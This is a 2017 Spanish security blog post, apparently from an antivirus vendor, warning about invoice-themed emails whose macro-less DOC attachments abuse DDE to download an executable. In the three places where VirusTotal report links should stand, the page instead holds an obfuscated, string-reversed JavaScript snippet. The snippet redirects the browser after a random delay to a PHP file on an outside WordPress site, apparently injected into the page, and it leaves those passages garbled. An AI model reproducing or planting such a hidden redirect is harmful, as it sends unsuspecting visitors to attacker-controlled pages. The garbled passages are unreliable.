MAS MAILS ANEXANDO DOC SIN MACROS QUE DESCARGAN MALWARE

Publicado el 24 octubre 2017 ¬ 16:11 pmh.mscComentarios desactivados en MAS MAILS ANEXANDO DOC SIN MACROS QUE DESCARGAN MALWARE

Recibidos mails anexando ficheros DOC sin macro, aparentando enviar facturas, pero que descargan ficheros maliciosos, los pasamos a controlar a partir del ELISTARA 37.72 de hoy

Los mails tipo son similares a :

Asunto: Your Invoice 247680
De: “Emilio” <Emilio.Respy@lawofficejmk.com>
Fecha: 24/10/2017 12:42
Para: undisclosed-recipients:;

Your Invoice is attached.

If you feel you have received this email in error, please reply to this email to inform us of any necessary corrections.

ANEXADO Invoice_file_01253.doc—> DESCARGA FICHERO Malware.Heropad64.EXE

Los preanalisis de virustotal ofrecen el siguiente informe:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b/analysis/1508852334/” target=”_blank” rel=”noopener”>Y el EXE descargado: heropad64.gxe

y otros similares recibidos esta tarde:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/f60aee6675dd409b91db0cd1e95489acbfa5175db77c5702d6338103292456cc/analysis/1508852992/” target=”_blank” rel=”noopener”>Invoice_file_81686.doc

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/f60aee6675dd409b91db0cd1e95489acbfa5175db77c5702d6338103292456cc/analysis/1508852992/” target=”_blank” rel=”noopener”>Invoice_file_88259.doc

 

La versión del ELISTARA 37.72 que detecta y elimina dichos EXE estará disponible en nuestra web a partir del 25/10 prox.

 

Mucho cuidado con los DOC anexados a los mails, que pueden llegar aparentando ser facturas y su ejecución, aun sin macros, descargan malware aprovechando la nueva “no vulnerabilidad” del protocolo DDE, recientemente descubierta

 

saludos

ms, 24-10-2017

 

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Spam, Virus, , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies